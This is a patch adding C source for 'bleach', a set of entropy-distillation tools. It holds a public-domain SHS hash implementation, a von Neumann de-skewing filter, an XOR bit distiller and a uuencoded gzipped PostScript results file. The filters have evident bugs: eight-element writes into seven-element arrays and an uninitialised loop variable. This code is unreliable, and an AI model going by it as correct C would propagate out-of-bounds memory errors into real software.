+ * a multiple of SHS_BLOCKSIZE bytes long, which makes the code a lot more
+ * efficient since it does away with the need to handle partial blocks
+ * between calls to shsUpdate()
+ */
+
+void shsUpdate (shsInfo, buffer, count)
+	SHS_INFO *shsInfo;
+	BYTE *buffer;
+	int count;
+{
+	/* Update bitcount */
+	if ((shsInfo->countLo + ((LONG) count << 3)) < shsInfo->countLo)
+		 shsInfo->countHi++;	/* Carry from low to high bitCount */
+	shsInfo->countLo += ((LONG) count << 3);
+	shsInfo->countHi += ((LONG) count >> 29);
+
+	/* Process data in SHS_BLOCKSIZE chunks */
+	while (count >= SHS_BLOCKSIZE) {
+		memcpy (shsInfo->data, buffer, SHS_BLOCKSIZE);
+		byteReverse (shsInfo->data, SHS_BLOCKSIZE);
+		shsTransform (shsInfo);
+		buffer += SHS_BLOCKSIZE;
+		count -= SHS_BLOCKSIZE;
+	}
+
+	/*
+	 * Handle any remaining bytes of data.
+	 * This should only happen once on the final lot of data
+	 */
+	memcpy (shsInfo->data, buffer, count);
+}
+
+void shsFinal (shsInfo)
+	SHS_INFO *shsInfo;
+{
+	int count;
+	LONG lowBitcount = shsInfo->countLo, highBitcount = shsInfo->countHi;
+
+	/* Compute number of bytes mod 64 */
+	count = (int) ((shsInfo->countLo >> 3) & 0x3F);
+
+	/*
+	 * Set the first char of padding to 0x80.
+	 * This is safe since there is always at least one byte free
+	 */
+	((BYTE *) shsInfo->data) [count++] = 0x80;
+
+	/* Pad out to 56 mod 64 */
+	if (count > 56) {
+		/* Two lots of padding:  Pad the first block to 64 bytes */
+		memset ((BYTE *) shsInfo->data + count, 0, 64 - count);
+		byteReverse (shsInfo->data, SHS_BLOCKSIZE);
+		shsTransform (shsInfo);
+
+		/* Now fill the next block with 56 bytes */
+		memset (shsInfo->data, 0, 56);
+	} else
+		/* Pad block to 56 bytes */
+		memset ((BYTE *) shsInfo->data + count, 0, 56 - count);
+	byteReverse (shsInfo->data, SHS_BLOCKSIZE);
+
+	/* Append length in bits and transform */
+	shsInfo->data [14] = highBitcount;
+	shsInfo->data [15] = lowBitcount;
+
+	shsTransform (shsInfo);
+	byteReverse (shsInfo->data, SHS_DIGESTSIZE);
+}
+<-->
+<++> bleach/sha/shs.h
+
+/* --------------------------------- SHS.H ------------------------------- */
+
+/*
+ * NIST proposed Secure Hash Standard. 
+ *
+ * Written 2 September 1992, Peter C. Gutmann.
+ * This implementation placed in the public domain. 
+ *
+ * Comments to pgut1@cs.aukuni.ac.nz 
+ */
+
+/* Useful defines/typedefs */
+
+#ifndef SHS_H
+#define SHS_H
+
+typedef unsigned char BYTE;
+typedef unsigned long LONG;
+
+/* The SHS block size and message digest sizes, in bytes */
+
+#define SHS_BLOCKSIZE	64
+#define SHS_DIGESTSIZE	20
+
+/* The structure for storing SHS info */
+
+typedef struct {
+	LONG digest [5];	/* Message digest */
+	LONG countLo, countHi;	/* 64-bit bit count */
+	LONG data [16];		/* SHS data buffer */
+} SHS_INFO;
+
+/* Turn off prototypes if requested */
+#if (defined(NOPROTO) && defined(PROTO))
+#	undef PROTO
+#endif
+
+/* Used to remove arguments in function prototypes for non-ANSI C */
+#ifdef PROTO
+#	define OF(a) a
+#else	/* !PROTO */
+#	define OF(a) ()
+#endif	/* ?PROTO */
+
+#define	local	static
+
+void shsInit OF((SHS_INFO *shsInfo));
+void shsUpdate OF((SHS_INFO *shsInfo, BYTE *buffer, int count));
+void shsFinal OF((SHS_INFO *shsInfo));
+
+#endif
+<-->
+
+<++> bleach/sha_distill.c
+#include <stdio.h>
+#include "sha/shs.h"
+
+main ()
+{
+	SHS_INFO shsInfo;
+	
+	unsigned char c[20];
+
+	while (fread(c, 1,20,stdin) == 20)
+	{
+		shsInit(&shsInfo);
+		shsUpdate(&shsInfo,c,20);
+		shsFinal(&shsInfo);
+		fwrite(&shsInfo,1,20,stdout);
+	}
+}
+<-->
+
+<++> bleach/transmap.c
+/* 
+    Implementation of von Neumann's transistion mapping scheme to de-skew
+    a series of random bits. See 5.2.2 of RFC1750 for more information.
+*/
+
+#include <stdio.h>
+char reconstruct_byte(char *byte_ary);
+main ()
+{
+	char c, b1, b2, i, j;
+	char byte[7];
+	j=0;
+	while ( !feof(stdin) )
+	{
+		fread(&c, 1,1,stdin);
+		for (i=7; i>=0; i-=2)
+		{
+			b1=((c>>i)&1); /* integer representation of bit i */
+			b2=((c>>(i-1))&1); 
+			if ( (b1==1) && (b2==0) ) /* translation of 10 */
+			{
+				byte[j]=1;
+				j++;
+			}
+			if ( (b1==0) && (b2==1) ) /* translation of 01 */
+			{
+				byte[j]=0;
+				j++;
+			}
+		}
+		if (j>7)
+		{
+			putc(reconstruct_byte(byte),stdout);
+			j=0;
+		}
+	} 
+}		
+char reconstruct_byte(char *byte_ary)
+{
+        char i;
+        char r = 0;
+        for (i=0; i<=7; i++)
+        {
+                r<<=1;
+                r|=byte_ary[i];
+        }
+        return r;
+} 
+<-->
+
+<++> bleach/xor_distill.c
+/* Distills entropy from a stream of skewed random bits by XORing
+   each bit in a byte against each other to obtain 1 output bit per
+   input byte. 8 such bits are reconstructed into a byte.
+*/
+#include <stdio.h>
+char reconstruct_byte(char *byte_ary);
+char xor_bits(char c);
+main ()
+{
+	char byte[7];
+	char c[7];
+	char i;
+	while (fread(c,1,8,stdin) == 8)
+	{
+		for (i=0; i<=7; i++)
+			byte[i]=xor_bits(c[i]);
+		putc(reconstruct_byte(byte), stdout);
+	}
+}		
+char xor_bits(char c)
+{
+	char i, f;
+	f=(c>>i)&1;
+	for (i=6; i>=0; i--)
+		f^=(c>>i)&1;
+	return f;
+}
+char reconstruct_byte(char *byte_ary)
+{
+        char i;
+        char r = 0;
+        for (i=0; i<=7; i++)
+        {
+                r<<=1;
+                r|=byte_ary[i];
+        }
+        return r;
+}
+<-->
+
+----[  Postscript file detailing empirical results
+
+<++> bleach/random.ps.gz.uue
+begin 644 random.ps.gz
+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
